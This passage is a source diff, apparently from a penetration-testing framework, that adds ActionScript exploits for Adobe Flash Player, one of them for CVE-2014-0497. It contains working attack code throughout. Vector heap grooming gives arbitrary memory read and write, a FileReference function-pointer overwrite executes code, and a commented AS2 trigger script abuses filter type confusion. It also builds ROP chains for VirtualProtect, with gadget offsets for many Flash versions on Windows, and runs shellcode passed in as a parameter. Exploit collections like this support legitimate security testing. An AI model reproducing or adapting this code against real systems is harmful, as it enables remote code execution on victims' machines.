+					tweaked_vector[47] = 41414141
+					tweaked_vector[48] = 41414141
+					tweaked_vector[49] = 41414141
+					tweaked_vector[4a] = 41414141
+					tweaked_vector[4b] = 41414141
+					tweaked_vector[4c] = 41414141
+					tweaked_vector[4d] = 41414141
+					tweaked_vector[4e] = 41414141
+					tweaked_vector[4f] = 41414141
+					tweaked_vector[50] = 41414141
+					tweaked_vector[51] = 41414141
+					tweaked_vector[52] = 41414141
+					tweaked_vector[53] = 41414141
+					tweaked_vector[54] = 41414141
+					tweaked_vector[55] = 41414141
+					tweaked_vector[56] = 41414141
+					tweaked_vector[57] = 41414141
+					tweaked_vector[58] = 0
+					tweaked_vector[59] = 0
+					tweaked_vector[5a] = 0
+					tweaked_vector[5b] = 0
+					tweaked_vector[5c] = 0
+					tweaked_vector[5d] = 0
+					tweaked_vector[5e] = 0
+					tweaked_vector[5f] = 0
+					tweaked_vector[60] = 0
+					tweaked_vector[61] = 0
+					tweaked_vector[62] = 0
+					tweaked_vector[63] = 0
+					tweaked_vector[64] = 0
+					tweaked_vector[65] = 0
+					tweaked_vector[66] = 0
+					tweaked_vector[67] = 0
+					tweaked_vector[68] = 0
+					tweaked_vector[69] = 0
+					tweaked_vector[6a] = 0
+					tweaked_vector[6b] = 0
+					tweaked_vector[6c] = 0
+					tweaked_vector[6d] = 0
+					// next -> next to the tweaked vector
+					tweaked_vector[6e] = 36
+					tweaked_vector[6f] = 1dea000
+					tweaked_vector[70] = 41414141
+					tweaked_vector[71] = 41414141
+					tweaked_vector[72] = 41414141
+					tweaked_vector[73] = 41414141
+					tweaked_vector[74] = 41414141
+					tweaked_vector[75] = 41414141
+					tweaked_vector[76] = 41414141
+					tweaked_vector[77] = 41414141
+					tweaked_vector[78] = 41414141
+					tweaked_vector[79] = 41414141
+					tweaked_vector[7a] = 41414141
+					tweaked_vector[7b] = 41414141
+					tweaked_vector[7c] = 41414141
+					tweaked_vector[7d] = 41414141
+					tweaked_vector[7e] = 41414141
+					tweaked_vector[7f] = 41414141
+					tweaked_vector[80] = 41414141
+					tweaked_vector[81] = 41414141
+					tweaked_vector[82] = 41414141
+					tweaked_vector[83] = 41414141
+					tweaked_vector[84] = 41414141
+					tweaked_vector[85] = 41414141
+					tweaked_vector[86] = 41414141
+					tweaked_vector[87] = 41414141
+					tweaked_vector[88] = 41414141
+					tweaked_vector[89] = 41414141
+					tweaked_vector[8a] = 41414141
+					tweaked_vector[8b] = 41414141
+					tweaked_vector[8c] = 41414141
+					tweaked_vector[8d] = 41414141
+					tweaked_vector[8e] = 41414141
+					tweaked_vector[8f] = 41414141
+					tweaked_vector[90] = 0
+					tweaked_vector[91] = 0
+					tweaked_vector[92] = 0
+					tweaked_vector[93] = 0
+					tweaked_vector[94] = 0
+					tweaked_vector[95] = 0
+					tweaked_vector[96] = 0
+					tweaked_vector[97] = 0
+					tweaked_vector[98] = 0
+					tweaked_vector[99] = 0
+					tweaked_vector[9a] = 0
+					tweaked_vector[9b] = 0
+					tweaked_vector[9c] = 0
+					tweaked_vector[9d] = 0
+					tweaked_vector[9e] = 0
+					tweaked_vector[9f] = 0
+					tweaked_vector[a0] = 0
+					tweaked_vector[a1] = 0
+					tweaked_vector[a2] = 0
+					tweaked_vector[a3] = 0
+					tweaked_vector[a4] = 0
+					tweaked_vector[a5] = 0
+					*/					
+					while(j < param1.length)
+					{						
+						this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j];
+						j++;
+					}
+					// next -> next to the tweaked vector
+					// tweaked_vector[a6] = 36					
+					// tweaked_vector[a7] = 1dea000
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000
+				}
+				else // From the Timeout trigger; never reached on my tests.
+				{
+					_loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1];
+					this.tweaked_vector[0x3fffffff] = _loc15_;
+					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_;
+					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector;
+					this.tweaked_vector[this.len_massage_vector + 1] = _loc15_;
+					this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_;
+					this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_;
+					this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector;
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
+					this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
+				}
+				
+				this.massage_array[corrupted_index].length = 256; // :?
+				
+				// Search backwards to find the massage array metadata
+				// It's used to disclose the tweaked vector address
+				i = 0;
+				var hint = 0;
+				while(true)
+				{
+					hint = this.tweaked_vector[0x40000000 - i];
+					if(hint == this.maxElementsPerPage-1) //  0xe00012 - 1
+					{
+						break;
+					}
+					i++;
+				}
+				
+				this.tweaked_vector_address = 0; 
+				if(this.tweaked_vector[0x40000000 - i - 4] == 0)
+				{
+					throw new Error("error");
+				}
+				else
+				{
+					this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length;
+					
+					// I have not been able to understand this tweak,
+					// Maybe not necessary at all...
+					i = 0;
+					hint = 0;
+					while(true)
+					{
+						hint = this.tweaked_vector[0x40000000 - i];
+						if(hint == 0x7e3f0004)
+						{
+							break;
+						}
+						i++;
+					}
+					
+					this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff					
+					// End of maybe not necessary tweak
+					
+					var file_ref_array = new Array();
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i] = new FileReference();
+						i++;
+					}
+					
+					var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address);
+					var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32);
+					
+					// Get array related data, important to trigger the desired corruption to achieve command execution
+					ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address); 
+					array_with_code = this.createCodeVectors(0x45454545, 0x90909090); 
+					address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545);
+					this.fillCodeVectors(array_with_code, address_code);
+					this.tweaked_vector[7] = ninbets[0] + 0;
+					this.tweaked_vector[4] = ninbets[1];
+					this.tweaked_vector[0] = 4096;
+					this.tweaked_vector[1] = address_code & 0xfffff000;
+					// Corruption
+					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8);
+					// Get arbitrary execution
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i].cancel();
+						i++;
+					}
+					this.tweaked_vector[7] = address_code;
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i].cancel();
+						i++;
+					}
+					// Restore Function Pointer
+					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup);
+						
+					return;
+				}
+			}
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// vector_address: address of tweaked vector
+		// address: address to read
+		function getMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint) : uint {
+			if(address >= vector_address)
+			{
+				return vector[(address - vector_address) / 4];
+			}
+			return vector[0x40000000 - (vector_address - address) / 4];
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// vector_address: address of tweaked vector
+		// address: address to write
+		// value: value to write
+		function writeMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint, value:uint) : * {
+			if(address >= vector_address)
+			{
+				vector[(address - vector_address) / 4] = value;
+			}
+			else
+			{
+				vector[0x40000000 - (vector_address - address) / 4] = value;
+			}
+		}
+		
+		function getNinbets(vector:*, vector_address:*) : Array {
+			var _loc9_:uint = 0;
+			var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c);
+			var index_array_related_addr:uint = 0;
+			var _loc5_:uint = 0;
+			var _loc6_:uint = 0;
+			if(array_related_addr >= vector_address)
+			{
+				index_array_related_addr = (array_related_addr - vector_address) / 4;
+			}
+			else
+			{
+				index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4;
+			}
+			var _loc7_:uint = 0;
+			while(true)
+			{
+				index_array_related_addr--;
+				_loc9_ = vector[index_array_related_addr];
+				if(_loc9_ == 0xfff870ff)
+				{
+					_loc7_ = 2;
+					break;
+				}
+				if(_loc9_ == 0xf870ff01)
+				{
+					_loc7_ = 1;
+					break;
+				}
+				if(_loc9_ == 0x70ff016a) 
+				{
+					_loc9_ = vector[index_array_related_addr + 1];
+					if(_loc9_ == 0xfc70fff8)
+					{
+						_loc7_ = 0;
+						break;
+					}
+				}
+				else
+				{
+					if(_loc9_ == 0x70fff870)
+					{
+						_loc7_ = 3;
+						break;
+					}
+				}
+			}
+			
+			_loc5_ = vector_address + 4 * index_array_related_addr - _loc7_;
+			index_array_related_addr--;
+			var _loc8_:uint = vector[index_array_related_addr];
+			if(_loc8_ == 0x16a0424)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0x6a042444)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0x424448b)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0xff016a04)
+			{
+				return [_loc5_,_loc6_];
+			}
+			
+			_loc6_ = _loc5_ - 6;
+			while(true)
+			{
+				index_array_related_addr--;
+				_loc9_ = vector[index_array_related_addr];
+				if(_loc9_ == 0x850ff50)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483)
+					{
+						_loc7_ = 0;
+						break;
+					}
+				}
+				_loc9_ = _loc9_ & 0xffffff00;
+				if(_loc9_ == 0x50ff5000)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0xcc48308)
+					{
+						_loc7_ = 1;
+						break;
+					}
+				}
+				_loc9_ = _loc9_ & 0xffff0000;
+				if(_loc9_ == 0xff500000)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0xc4830850)
+					{
+						if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c)
+						{
+							_loc7_ = 2;
+							break;
+						}
+					}
+				}
+				_loc9_ = _loc9_ & 0xff000000;
+				if(_loc9_ == 0x50000000) 
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0x830850ff)
+					{
+						if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4)  
+						{
+							_loc7_ = 3;
+							break;
+						}
+					}
+				}
+			}
+			
+			_loc5_ = vector_address + 4 * index_array_related_addr + _loc7_;
+			return [_loc5_,_loc6_];
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// address: address of tweaked vector
+		function getFileReferenceLocation(vector:*, address:*) : uint {
+			var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28);
+			var _loc4_:uint = 0;
+			while(true)
+			{
+				_loc4_ = this.getMemoryAt(vector,address,flash_address + 8);
+				if(_loc4_ == 0x2a0)
+				{
+					break;
+				}
+				if(_loc4_ < 0x2a0)
+				{
+					flash_address = flash_address + 36;
+				}
+				else
+				{
+					flash_address = flash_address - 36;
+				}
+			}
+			
+			var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12);
+			while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff)
+			{
+				if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff)
+				{
+					break;
+				}
+				file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8);
+			}
+			return file_ref_related_addr;
+		}
+				
+		function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint {
+			var vector_length_read:uint = 0;
+			var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c);
+			while(true)
+			{
+				vector_length_read = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8);
+				if(vector_length_read == 2032) // code vector length
+				{
+					break;
+				}
+				vector_code_info_addr = vector_code_info_addr + 0x24;
+			}
+			
+			var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc);
+			while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark)
+			{
+				vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8);
+			}
+			return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark
+		}
+		
+		// Every vector in the array => 7f0 (header = 8; data => 0x7e8)
+		function createCodeVectors(mark:uint, nops:uint) : * {
+			var array:Array = new Array();
+			var i:* = 0;
+			while(i < 8)
+			{
+				array[i] = new Vector.<uint>(2032 / 4 - 8);
+				array[i][0] = mark;
+				array[i][1] = nops;
+				i++;
+			}
+			return array;
+		}
+		
+		function fillCodeVectors(param1:Array, param2:uint) : * {
+			var i:uint = 0;
+			var sh:uint=1;
+			
+			while(i < param1.length)
+			{				
+				for(var u:String in shellcodeObj)
+				{
+					param1[i][sh++] = Number(shellcodeObj[u]); 
+				}
+				i++;
+				sh = 1;
+			}
+		}
+
+	}
+}
+
+// Trigger's ActionScript
+
+/*
+
+// Action script...
+
+// [Action in Frame 1]
+var b = new flash.display.BitmapData(4, 7);
+var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4);
+var b2 = new flash.display.BitmapData(256, 512);
+var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4);
+var colors = [16777215, 16711680, 16776960, 52479];
+var alphas = [0, 1, 1, 1];
+var ratios = [0, 63, 126, 255];
+var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false);
+var cmf = new flash.filters.ColorMatrixFilter([]);
+MyString2.setCMF(cmf);
+MyString1.setGGF(ggf);
+flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302);
+zz = MyString1;
+flash.display.BitmapData = zz;
+arr = new Array();
+var i = 0;
+while (i < 8192)
+{
+	arr[i] = new Number(0);
+	++i;
+} // end while
+var i = 100;
+while (i < 8192)
+{
+	arr[i] = "qwerty";
+	i = i + 8;
+} // end while
+k = filt.mapBitmap;
+zz = MyString2;
+flash.display.BitmapData = zz;
+k = filt.mapBitmap;
+cmf_matrix = cmf.matrix;
+cmf_matrix[4] = 8192;
+cmf_matrix[15] = 12.080810;
+cmf.matrix = cmf_matrix;
+ggf_colors = ggf.colors;
+ggf_alphas = ggf.alphas;
+mem = new Array();
+var i = 0;
+while (i < ggf_alphas.length)
+{
+	ggf_alphas[i] = ggf_alphas[i] * 255;
+	++i;
+} // end while
+for (i = 0; i < ggf_colors.length; i++)
+{
+	mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216;
+} // end of for
+ggf.colors = colors;
+ggf.alphas = alphas;
+ggf.ratios = ratios;
+var lc = new LocalConnection();
+lc.send("toAS3", "as2loaded", mem); 
+zz = cmf;
+zz.resetMe("b", 1, 1, 1);
+
+
+class MyString1 extends String
+{
+	static var ggf;
+	function MyString(a,b)
+	{
+		super();
+	}
+	
+	static function setGGF(myggf)
+	{
+		ggf = myggf;
+	}
+	
+	static function getGGF()
+	{
+		return (MyString1.ggf);
+	}
+}
+
+class MyString2 extends String
+{
+	static var cmf;
+	function MyString2(a,b)
+	{
+		super();
+	}
+	
+	static function setCMF(mycmf)
+	{
+		cmf = mycmf;
+	}
+	
+	static function getCMF()
+	{
+		return (MyString2.cmf);
+	}
+}
+
+
+*/
diff --git a/external/source/exploits/CVE-2014-0497/Vickers.as b/external/source/exploits/CVE-2014-0497/Vickers.as
new file mode 100755
index 0000000000..02db79f39e
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0497/Vickers.as
@@ -0,0 +1,797 @@
+//Compile with mxmlc Vickers.as -o Vickers.swf
+package 
+{
+	import flash.display.Sprite;
+	import flash.system.Capabilities;
+	import flash.utils.ByteArray;
+	import __AS3__.vec.Vector;
+	import flash.system.ApplicationDomain;
+	import avm2.intrinsics.memory.*;
+	
+	public class Vickers extends Sprite 
+	{
+		
+		public static var shellcode:String;
+		
+		public function Vickers()
+		{
+			var params = root.loaderInfo.parameters;
+			shellcode = params["id"];
+			while (true)
+			{
+				if (exploit()) break;
+			};
+		}
+		
+		public function makePayload(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var payload = null;
+			switch (Capabilities.os.toLowerCase())
+			{
+				case "windows xp":
+				case "windows vista":
+				case "windows server 2003 r2":
+				case "windows server 2003":
+				case "windows 7":
+				case "windows 7 x64":
+				case "windows server 2008 r2":
+				case "windows server 2008":
+					payload = makePayloadWinOther(vftableAddr, scAddr);
+					break;
+				case "windows 8":
+				case "windows 8 x64":
+					payload = makePayloadWin8(vftableAddr, scAddr);
+					break;
+				default:
+					return (null);
+			};
+			return (payload);
+		}
+		
+		public function makePayloadWin8(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var flash_base:uint = vftableAddr;
+			var flash_end:uint;
+			var rop_payload:ByteArray = new ByteArray();
+			rop_payload.position = 0;
+			rop_payload.endian = "littleEndian";
+			rop_payload.writeUnsignedInt((scAddr + 4));
+			switch (Capabilities.version.toLowerCase())
+			{
+				case "win 11,3,372,94":
+					flash_base = (flash_base - 9518744);
+					flash_end = (flash_base + 0xB10000);
+					rop_payload.writeUnsignedInt((flash_base + 0x401404)); // add esp, 0x44; ret 
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 0x26525));  // xchg eax, esp; ret
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 0x10c5));   // pop eax; ret
+					rop_payload.writeUnsignedInt((flash_base + 0x817420)); // ptr to KERNEL32!VirtualProtectStub 
+					rop_payload.writeUnsignedInt((flash_base + 0x9e16));   // mov eax, dword ptr [eax]; ret
+					rop_payload.writeUnsignedInt((flash_base + 0xcc022));  // push eax; ret 
+					rop_payload.writeUnsignedInt((flash_base + 0x3157c));  // jmp esp ; ret after VirtualProtect
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(0x40);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,375,10":
+					flash_base = (flash_base - 9589392);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220004));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 142215));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 40214));
+					rop_payload.writeUnsignedInt((flash_base + 840082));
+					rop_payload.writeUnsignedInt((flash_base + 202134));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,376,12":
+					flash_base = (flash_base - 9593552);
+					flash_end = (flash_base + 0xB16000);
+					rop_payload.writeUnsignedInt((flash_base + 4220740));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 142023));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8508448));
+					rop_payload.writeUnsignedInt((flash_base + 39878));
+					rop_payload.writeUnsignedInt((flash_base + 839538));
+					rop_payload.writeUnsignedInt((flash_base + 201958));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,377,15":
+					flash_base = (flash_base - 9589576);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220388));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 141671));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 39526));
+					rop_payload.writeUnsignedInt((flash_base + 839698));
+					rop_payload.writeUnsignedInt((flash_base + 201590));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,378,5":
+					flash_base = (flash_base - 9589448);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220388));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 141671));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 39526));
+					rop_payload.writeUnsignedInt((flash_base + 839698));
+					rop_payload.writeUnsignedInt((flash_base + 201590));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,379,14":
+					flash_base = (flash_base - 9597856);
+					flash_end = (flash_base + 0xB17000);
+					rop_payload.writeUnsignedInt((flash_base + 4575113));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 6617808));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 8149060));
+					rop_payload.writeUnsignedInt((flash_base + 8512544));
+					rop_payload.writeUnsignedInt((flash_base + 4907562));
+					rop_payload.writeUnsignedInt((flash_base + 8147977));
+					rop_payload.writeUnsignedInt((flash_base + 4046601));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,167":
+					flash_base = (flash_base - 9821704);
+					flash_end = (flash_base + 0xB85000);
+					rop_payload.writeUnsignedInt((flash_base + 8405950));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 27456));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8791088));
+					rop_payload.writeUnsignedInt((flash_base + 73494));
+					rop_payload.writeUnsignedInt((flash_base + 1115794));
+					rop_payload.writeUnsignedInt((flash_base + 242790));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,171":
+					flash_base = (flash_base - 9821904);
+					flash_end = (flash_base + 0xB85000);
+					rop_payload.writeUnsignedInt((flash_base + 8406414));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 27456));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8791088));
+					rop_payload.writeUnsignedInt((flash_base + 73078));
+					rop_payload.writeUnsignedInt((flash_base + 1116754));
+					rop_payload.writeUnsignedInt((flash_base + 242380));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,180":
+					flash_base = (flash_base - 9816600);
+					flash_end = (flash_base + 0xB84000);
+					rop_payload.writeUnsignedInt((flash_base + 8404478));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 29514));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8786992));
+					rop_payload.writeUnsignedInt((flash_base + 69382));
+					rop_payload.writeUnsignedInt((flash_base + 175197));
+					rop_payload.writeUnsignedInt((flash_base + 238732));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,169":
+					flash_base = (flash_base - 10441412);
+					flash_end = (flash_base + 0xC45000);
+					rop_payload.writeUnsignedInt((flash_base + 4640769));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 53338));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 9368732));
+					rop_payload.writeUnsignedInt((flash_base + 95414));
+					rop_payload.writeUnsignedInt((flash_base + 1145506));
+					rop_payload.writeUnsignedInt((flash_base + 2156132));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,202":
+					flash_base = (flash_base - 0x9f5470);
+					flash_end = (flash_base + 0xC45000);
+					rop_payload.writeUnsignedInt((flash_base + 0x46c361));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 0xcc5a));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 0x10c5));
+					rop_payload.writeUnsignedInt((flash_base + 0x8ef49c));
+					rop_payload.writeUnsignedInt((flash_base + 0x17136));
+					rop_payload.writeUnsignedInt((flash_base + 0x42f0));
+					rop_payload.writeUnsignedInt((flash_base + 0x40664));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,224":
+					flash_base = (flash_base - 10450228);
+					flash_end = (flash_base + 0xC7A000);
+					rop_payload.writeUnsignedInt((flash_base + 4646881));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 52090));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 9376924));
+					rop_payload.writeUnsignedInt((flash_base + 93510));
+					rop_payload.writeUnsignedInt((flash_base + 1145378));
+					rop_payload.writeUnsignedInt((flash_base + 1909483));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				default:
+					return (null);
+			};
+			return (rop_payload);
+		}
+		
+		public function makePayloadWinOther(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var vftableAddr_copy:uint = vftableAddr;
+			var _local_5:uint;
+			var payload:ByteArray = new ByteArray();
+			payload.position = 0;
+			payload.endian = "littleEndian";
+			payload.writeUnsignedInt((scAddr + 4));
+			switch (Capabilities.version.toLowerCase())
+			{
+				case "win 11,0,1,152":
+					vftableAddr_copy = (vftableAddr_copy - 7628676);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 1041567));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1937003));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 4585805));
+					payload.writeUnsignedInt((vftableAddr_copy + 6697912));
+					payload.writeUnsignedInt((vftableAddr_copy + 2201532));
+					payload.writeUnsignedInt((vftableAddr_copy + 3985044));
+					payload.writeUnsignedInt((vftableAddr_copy + 2764856));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,55":
+					vftableAddr_copy = (vftableAddr_copy - 7633040);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4793772));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939267));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 2297101));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 3976335));
+					payload.writeUnsignedInt((vftableAddr_copy + 3516263));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768033));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,62":
+					vftableAddr_copy = (vftableAddr_copy - 7628912);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4794156));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939856));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5126527));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 2920469));
+					payload.writeUnsignedInt((vftableAddr_copy + 4454837));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768325));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,63":
+					vftableAddr_copy = (vftableAddr_copy - 7628904);
